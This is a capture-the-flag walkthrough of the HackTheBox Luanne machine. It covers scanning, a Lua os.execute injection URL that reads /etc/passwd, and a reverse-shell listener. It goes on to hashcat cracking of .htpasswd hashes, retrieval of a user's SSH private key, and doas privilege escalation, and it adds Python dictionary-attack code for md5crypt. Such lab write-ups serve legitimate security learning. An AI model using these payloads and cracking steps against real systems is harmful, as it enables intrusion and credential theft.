Luanne HackTheBox WalkThrough
This is the Luanne HackTheBox machine walkthrough. In this writeup I demonstrate step by step how I rooted the Luanne HTB machine. Before starting, a few facts about the box: it is a NetBSD machine (which I only confirmed after getting onto it) with IP address 10.10.10.218 and difficulty Easy as assigned by its maker. First of all, connect your PC to the HackTheBox VPN and verify connectivity to the Luanne machine by pinging its IP, 10.10.10.218. If all goes well, start hacking.
As usual, I started by scanning the machine. I used Nmap (a port scanner) for this, and this time added the -O switch for operating system detection, since we did not know the OS in advance. The result is below.
Scanning
$ sudo nmap -sC -sV -O -oN luanne.nmap 10.10.10.218
Nmap found ports 22, 80 and 9001 open, but -O neither identified the OS nor offered a guess. That is fine; we will learn the name and version once we are inside the box. For now let us enumerate ports 22, 80 and 9001. OpenSSH 8.0 is running on port 22, and its version banner already names the operating system: NetBSD. So we know the OS of the Luanne machine is NetBSD. SSH will be useful once further enumeration gives us credentials.
Let us dig deeper into the services on the remaining ports. Nginx 1.19 is the web server on port 80, and Medusa 1.12 (the web interface of the Supervisor process manager, according to nmap's service detection) is on port 9001. Since both are web servers, we should find websites at http://10.10.10.218 and http://10.10.10.218:9001. Both URLs answer with an HTTP Basic authentication prompt, the browser login box you also get from Tomcat's manager application. If you read the nmap report closely, the http-robots.txt script reports one disallowed entry, a folder named weather on port 80, which should be reachable at http://10.10.10.218/weather/.
Visiting this URL gave a 404 - Not Found error. So I brute-forced files and folders below it with dirsearch (a directory and file brute-forcer written in Python) and the wordlist directory-list-1.0.txt (on Kali and Parrot it lives in /usr/share/wordlists/dirbuster/).
Directory Bruteforcing
$ sudo dirsearch -u http://10.10.10.218/weather/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e all -t 40 | tee big.out
Directory brute-forcing revealed a file named forecast. Requesting it at http://10.10.10.218/weather/forecast returned a JSON message saying that no city was specified and that the parameter city with the value list, i.e. city=list, enumerates the available cities. Requesting city=list returned information about several cities.
Further enumeration and fuzzing of the city parameter produced an error revealing that the application is written in Lua: a single quote in the value, http://10.10.10.218/weather/forecast?city=London', triggers a Lua syntax error instead of a clean JSON reply. Since the backend is Lua, I fuzzed the parameter with Lua syntax and found that appending ')os.execute("whoami")-- to http://10.10.10.218/weather/forecast?city=London executes an OS command on the Luanne machine. The quote closes the string our value lands in, the parenthesis closes the call around it, os.execute() runs the command, and the trailing -- turns the remainder of the line into a Lua comment so the chunk still parses. I think this is also why the machine is named Luanne: we execute code through a Lua statement, and Luanne contains the word Lua. Let us confirm OS command execution by reading the /etc/passwd file of the Luanne machine.
Confirming OS Command Execution
Open the following URL in the browser to confirm code execution on the Luanne machine (the trailing -- is two ordinary hyphens, the Lua comment marker; the quotes and the space are percent-encoded).
http://10.10.10.218/weather/forecast?city=London%27)os.execute(%22cat%20/etc/passwd%22)--
We have confirmed remote code execution on the Luanne machine. Let us turn it into an interactive shell on our local machine with a reverse shell one-liner. I used the nc one-liner; you can find others at Pentestmonkey.
Getting User Shell
To get a reverse shell, first start a netcat listener on your Kali machine, then open the injection URL carrying the reverse-shell command in the browser, the same way as the /etc/passwd check above. You will get a shell.
$ rlwrap nc -nvlp 1234
$ whoami && id
We have a shell as user _httpd. This user's home directory, which is also the current directory, contains a hidden file .htpasswd, and listing it reveals a password hash for user webapi_user.
$ ls -la
$ cat .htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
Let us identify the type of this hash so that we can crack it with hashcat (an offline password cracker).
$ hash-identifier
HASH: $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
hash-identifier reports it as MD5 (Unix), the crypt(3) md5crypt format marked by the $1$ prefix, which is hashcat mode 500. Let us crack it with the wordlist rockyou.txt, found in /usr/share/wordlists/ on Kali and Parrot OS (it ships gzipped there; gunzip it first if needed).
Cracking Hash 1 using Hashcat
$ hashcat -m 500 -a 0 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 0 '$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0' /usr/share/wordlists/rockyou.txt --show
Hashcat cracked the hash; the password is iamthebest, so we have the credential webapi_user:iamthebest. (-m 500 selects md5crypt; use -a 0, the straight wordlist mode, when the last argument is a wordlist file, since -a 3 is the mask-attack mode and reads the file as a list of masks instead.) SSH with this credential failed: webapi_user is an HTTP user from .htpasswd, not a system account in /etc/passwd. Further enumeration showed that ports 3000 and 3001 are listening on the loopback interface only (netstat -an -f inet on NetBSD shows the bound addresses), which is why nmap never saw them.
Requesting the service on port 3001 at http://127.0.0.1:3001 returned 401 Unauthorized. Supplying the credential webapi_user:iamthebest as HTTP Basic authentication got us in without any access-denied error.
$ curl http://127.0.0.1:3001
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001
Further enumeration turned up the id_rsa key of user r.michaels, fetched from that user's web directory with curl. This is unusual: normally id_rsa sits in the .ssh folder of the user's home directory and is readable only by that user and root. Here it is served by the web server running locally under the ~r.michaels path, so the file must live in some kind of public_html folder that the server maps per-user paths to; I did not know the exact folder name until I had pwned the box.
$ curl -u 'webapi_user':'iamthebest' http://127.0.0.1:3001/~r.michaels/id_rsa
We have the SSH private key. Save it to a file, restrict its permissions (ssh refuses keys that are group- or world-readable), and SSH into the Luanne machine with it.
Getting User Shell using SSH
$ vi id_rsa
$ chmod 400 id_rsa
$ ssh -i id_rsa r.michaels@10.10.10.218
$ whoami && id
We are now logged in as user r.michaels. Let us capture the user flag.
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate privileges to root we first need a privilege escalation vector. I ran linpeas.sh (a post-exploitation enumeration script), but linpeas did not find a valid PrivEsc vector, so I switched to manual enumeration on the box. After spending some time on it I found an encrypted file, devel_backup-2020-09-16.tar.gz.enc, in the directory /home/r.michaels/backups/. I did not know how to extract it at first: a .gz or .tgz archive would be unpacked with tar, but this one carries a .enc extension, so it has to be decrypted before tar can touch it. Some searching turned up netpgp, the PGP implementation that ships with NetBSD, which can decrypt the file with the secret key in r.michaels's ~/.netpgp keyring. See the netpgp(1) manual page for more info.
Finding PrivEsc Vector
$ ls -la /home/r.michaels/backups/
To extract it I changed into /tmp/ (somewhere writable), decrypted the archive there and unpacked it with the following commands. When it asks for a password, enter iamthebest.
$ cd /tmp/
$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=devel_backup-2020-09-16.tar.gz
$ tar -xf devel_backup-2020-09-16.tar.gz
$ cat devel-2020-09-16/www/.htpasswd
The extracted archive contains an older copy of .htpasswd with another hash for user webapi_user: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu. It is again MD5 (Unix), as hash-identifier confirms.
$ hash-identifier
HASH: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
Cracking this hash with hashcat gave the password littlebear. I then tried to switch to root with the doas command of NetBSD and logged in as root without trouble. doas authenticates the invoking user, so this works because r.michaels reuses the old web password littlebear and the doas configuration permits r.michaels to run commands as root. Our PrivEsc vector is therefore credential dumping plus password reuse: a password recovered from a backup file.
Cracking Hash 2 using Hashcat
$ hashcat -m 500 -a 0 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt
$ hashcat -m 500 -a 0 '$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.' /usr/share/wordlists/rockyou.txt --show
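Verifying both hashes from this walkthrough (the live .htpasswd and the one from the backup) without hashcat, as an added example that is not part of the original writeup: the Python below implements the crypt(3) md5crypt scheme ($1$salt$hash) that hash-identifier labelled MD5 (Unix), parses .htpasswd lines, and runs a small dictionary attack. The two .htpasswd lines are the ones found on the box; the candidate wordlist is a constructed four-entry stand-in for rockyou.txt. Only the $1$ format is handled; other htpasswd formats ($apr1$, {SHA}, bcrypt) raise rather than being silently skipped.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: emit `count` 6-bit groups, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str) -> str:
    """Poul-Henning Kamp's md5crypt, as used by NetBSD crypt(3) and hashcat -m 500."""
    pw = password.encode()
    salt_b = salt[:8].encode()               # the salt is at most 8 characters
    ctx = hashlib.md5(pw + b"$1$" + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:                     # mix in alt, len(pw) bytes in total
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:                               # one byte per bit of len(pw)
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):                    # the deliberately slow stretching loop
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    encoded = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
               + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
               + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
               + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
               + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
               + _to64(f[11], 2))
    return f"$1${salt_b.decode()}${encoded}"


def parse_htpasswd(text: str) -> dict:
    """Map user -> hash for every non-empty, non-comment 'user:hash' line."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.partition(":")
        entries[user] = digest
    return entries


def dictionary_attack(digest: str, candidates):
    """Return the first candidate whose md5crypt hash equals digest, else None."""
    parts = digest.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("only $1$ (md5crypt) hashes are supported: " + digest)
    salt = parts[2]
    for cand in candidates:
        if hmac.compare_digest(md5crypt(cand, salt), digest):
            return cand
    return None


def crack_htpasswd(text: str, candidates) -> dict:
    """Crack every entry of an .htpasswd file; unmatched users map to None."""
    return {user: dictionary_attack(h, candidates)
            for user, h in parse_htpasswd(text).items()}


# The two .htpasswd files from the box: the live one and the one in the backup.
HTPASSWD_LIVE = "webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0\n"
HTPASSWD_BACKUP = "webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.\n"
# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "123456", "iamthebest", "littlebear"]

if __name__ == "__main__":
    print(crack_htpasswd(HTPASSWD_LIVE, WORDLIST))      # {'webapi_user': 'iamthebest'}
    print(crack_htpasswd(HTPASSWD_BACKUP, WORDLIST))    # {'webapi_user': 'littlebear'}
```

Because md5crypt takes the salt from the stored hash, the same function also lets you verify a candidate against any $1$ line you find in a backup before spending GPU time on it; the 1000-round loop is what makes each guess cost more than a plain MD5.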
Let us switch to the root user with the doas command. doas on NetBSD (installed from pkgsrc, originally from OpenBSD) plays the role that sudo plays on Linux: it executes a command as another user, subject to the permit and deny rules in doas.conf (/usr/pkg/etc/doas.conf for the pkgsrc package), and asks for the invoking user's own password. For more info check this link from FreeBSD.org.
$ doas -u root /bin/sh
Password: littlebear
# whoami && id
Capture Root Flag
Let us capture the root flag.
# cat /root/root.txt
This is how I rooted the Luanne HackTheBox machine. I learnt a lot from this box, and I hope you have also learnt something new from this walkthrough. Thanks for reading. For any query or suggestion feel free to write to us at [email protected].